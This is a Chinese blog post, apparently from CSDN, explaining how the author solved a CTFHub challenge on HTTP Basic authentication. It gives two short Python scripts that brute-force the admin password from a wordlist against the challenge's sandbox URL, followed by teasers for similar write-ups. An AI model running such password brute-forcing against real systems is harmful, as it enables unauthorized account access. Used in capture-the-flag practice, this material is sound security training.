CTFHub http协议 基础认证题的两种解法

最新推荐文章于 2024-06-06 13:54:24 发布
最新推荐文章于 2024-06-06 13:54:24 发布
阅读量1.2k 收藏 3
点赞数 2
分类专栏: web渗透测试心得 Python实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108850086
版权

CTFHub http协议 基础认证题

在做natas时就经常遇到需要http基础认证,python中requests模块提供了对应的方法可以用来对账号密码进行爆破。
这题考察
打开题目抓包,点击click获取flag,弹框需要账号密码,随便输入账号密码,已知账号admin,题干下面提供了密码的字典,直接上python脚本走一波

方法一:利用python中requests模块的auth.HTTPBasicAuth爆破

import requests
proxies={"http:http://127.0.0.1:5080"}
username='admin'
with open(r'10_million_password_list_top_100.txt','r') as f:
    lines=f.readlines()
    for pwd in lines:
        password=pwd.rstrip('\n')
        url = "http://challenge-537d355a9df61d39.sandbox.ctfhub.com:10080/flag.html"
        auth=requests.auth.HTTPBasicAuth(username,password)
        print(auth)
        res=requests.get(url=url,auth=auth)
        ss=res.status_code
        if ss==200:
            print("password is %s,status_code is %s" %(password,ss))

通过requests模块,该模块提供了http基础认证的方法,直接爆破密码,根据返回值为200则密码正确,否则返回值为401,密码错误。

方法二:通过浏览器可以用http://username:password@domain的方式进行登陆验证

import requests
username='admin'
with open(r'10_million_password_list_top_100.txt','r') as f:
    lines=f.readlines()
    for pwd in lines:
        password=pwd.rstrip('\n')
        url = "http://admin:%s@challenge-da462e6a1d7f1d65.sandbox.ctfhub.com:10080/flag.html" %password     
        res=requests.get(url=url)
        ss=res.status_code
        # if ss==200:
        print("password is %s,status_code is %s" %(password,ss))

爆破结果:
在这里插入图片描述

最终flag:
在这里插入图片描述

tempulcc
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3.18号日报,ctfhub中web,文件上传漏洞解法
03-18
文件上传漏洞
第三节 暴力破解 - HTTP Basic认证-01
09-15
第三节 暴力破解 - HTTP Basic认证-01
CTFHub Web前置技能 HTTP协议基础认证
qq_46222050的博客
08-21 554
HTTP基础认证 我们打开目,点击跳转发现需要用户名和密码,根据提示“Do you know admin?”,我们猜测用户名为admin。目给的附件解压完事字典,很明显这道目要使用爆破。 我们挂上代理ip,打开burp suite抓包,随便输入一个密码然后截取.我们发现Basic,Basic 表示“基础认证”.使用解码器解码为admin:123,就是我们输入的用户名与密码. 我们右键发送到测试器,添加$。 有效载荷集为1,有效载荷类型为自动迭代器,载入给你的字典. 有效负载处理里面添加前缀
CTFHUB-HTTP协议(四)------基础认证
Y4tacker的博客
07-22 9319
一看就知道估计得爆破,烦躁!!! 打开页面后出现,点击click 输入admin与admin 通过burp抓包发现是通过base64编码了 我一开始憨批了,没看到有个附件自己去搞了个字典没爆出来,记得下载附件 将请求发送给测试器 下一步 点击导入字典 但是发现前面没有admin: 写了个python来组合 import base64 with open(10_million_password_list_top_100.txt, r+) as f for line in f.rea
CTFHub:web前置技能-HTTP协议-基础认证
最新发布
wdnmddbl的博客
06-06 751
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:Basic 认证原理Basic 认证HTTP协议支持的最简单形式的身份验证机制。它的原理基于“用户名:密码”的凭据,通过HTTP头部进行传输。具体来说,当用户尝试访问一个需要认证的资源时,服务器会返回一个401 Unauthorized响应,同时在响应头中包含WWW-Authenticate字段,提示客户端需要提供认证信息。用户提供的用户名和密码将按照以下格式组合:username:password。
CTFHUB-WEB前置技能-HTTP协议-基础认证
weixin_43486981的博客
08-09 2082
HTTP基础认证学习地址:https://zh.wikipedia.org/wiki/HTTP%E5%9F%BA%E6%9C%AC%E8%AE%A4%E8%AF%81 目 靶机环境: 目附件下载下来是个字典 点击Click,需要输入用户名和密码 尝试输入admin,admin,没有反应。 使用burp suite抓包 。 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。在进
ctfhub-HTTP协议-基础认证
m0_62094846的博客
11-07 285
但抓不了包,但我看很多人wp都是可以的 只能在这个页面抓包了,再自己添加这一段 如果乱添加一通的话,会显示Douknowadmin,可能表示用户名是admin,字典上也只是给了密码,所以账号已知 Authorization:Basic是固定格式 后一段表示 用户名:密码 接下来爆破 下面的和之前的有些不一样,因为密码要编码成base64 添加前缀和编码方式 取消勾选,否则,=会被转为%3d (12条消息) Burp S...
CTFHUB HTTP协议/Cookie
null1024的博客
08-20 258
一、
CTF100.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
RPA高级认证B卷答案另一种解法
05-08
本话聚焦于“RPA高级认证B卷答案”的另一种解法,这为考生提供了多角度理解和解决问的思路。 "用机器人获取三类信息"是RPA应用中的一个常见场景,通常涉及数据抓取、系统交互和流程自动化。这三类信息可能包括...
中考化学科普阅读解法与技巧.pdf
08-30
科普阅读理解是中考化学试卷中的一种新型型,旨在考察学生的综合阅读理解能力和应用基础知识解决实际问的能力。随着北京市深化考试招生制度改革,科普阅读理解逐渐受到重视,成为多地中考化学命的新趋势。...
中考化学流程图解法与技巧.pdf
08-30
【中考化学流程图解法与技巧】 中考化学流程图是一种常见的考试型,它结合了化学反应原理、元素化合物知识、实验操作及名称、物质除杂和分离等多个知识点,旨在考察学生的综合理解能力和实际应用能力。解...
CTFHub-web(基础认证)
分享与记录
03-26 8918
发现目需要登录,先任意输入admin/admin进行登录尝试。没什么反应。抓包看数据。可以看见一条特殊字符串Basic realm="Do u know admin ?,暂时没有其他线索,我们假设用户名就是admin,然后进行暴力破解。 Basic表示基础认证,字符串格式xxxxxxxxx==大概率为Base64编码 Base64解码得到开始尝试输入的账号和密码 将报文发送到Intrude...
CTFHub http协议 基础认证
weixin_44732566的博客
02-26 3790
CTFHub http协议 基础认证 http基础认证401,就是访问一个网站时会弹出一个输入用户名和密码的弹窗,输入正确方可以访问这个网站。用户名密码是通过base64编码以后传播的 打开目 当然是点击,出现一个弹窗,提示我们用户名是admin,那就剩个密码,burpsuite抓包,爆破 载荷里就是base64编码后的用户名和密码 admin:123456 这肯定密码不对,目入口有一个...
CTFHub_技能树_Web前置技能之HTTP协议——“基础认证
Ho1aAs‘s Blog
07-22 683
文章目录使用工具做过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 IE v8.0 Burpsuite v2.1 SwitchyOmega扩展插件 做过程 访问网站,弹出登录框 密码肯定是附件里面的,而用户名未知 更换浏览器再次尝试登陆 得到用户名admin 抓包看一下数据是如何发送的 Base64解码 密码是以 admin:密码 形式发送的 那么我们编写脚本处理所有密码 以下是Python代码 import base64
ctfhub HTTP协议-基础认证
qq_44640313的博客
01-20 682
HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。
CTFHUB基础认证》:burp使用,basic请求了解
weixin_45694388的博客
11-10 1654
目简介:在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 根据已知可得,这应该是道爆破密码,而且已知字典 根据抓包可知,本网页提交会将用户名密码经过base64加密后提交,且格式为: 用户名:密码 先输入字典 增加爆破规则: 增加前缀admin: 再base64编码 开始爆破
HTTP编码和解码与基本认证
Cdreamfly的博客
06-15 205
咱们在计算机屏幕上看到的是实体化的文字,而在计算机存储介质中存放的实际是二进制的比特流。那么在这二者之间的转换规则就须要一个统一的标准,不然把计算机上文档就乱码了;因而为了实现转换标准,各类字符集标准就出现了。简单的说字符集就规定了某个文字对应的二进制数字存放方式(编码)和某串二进制数值表明了哪一个文字(解码)的转换关系。......
身份认证(暴力破解基础
YOU
07-19 3909
身份认证(暴力破解入门)身份认证(一)基于口令的认证(二)双因子身份认证技术(三)数字签名技术(四)数字证书(五)公钥基础设施(PKI)(六)常见的Web认证攻击HydraBurpSuite破解HashCrunch工具 身份认证 身份认证的目的是鉴别通信中另一端的真实身份,防止伪造和假冒等情况发生。进行身份认证的技术方法主要是密码学方法,包括使用对称加密算法、公开密钥密码算法、数字签名算法等。 对称加密算法是根据Shannon理论建立的一种变换过程,该过程将一个密钥和一个数据充分混淆和置乱,使非法用户在不知
408考研顺序表 暴力解法总结
07-02
本文主要针对408计算机专业考研中的算法暴力解法进行总结,强调了在考试中编写代码的注意事项,以及如何有效地利用简写和注释提高代码可读性。在考研编程目中,清晰的逻辑和表达思路对得分至关重要。 首先,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值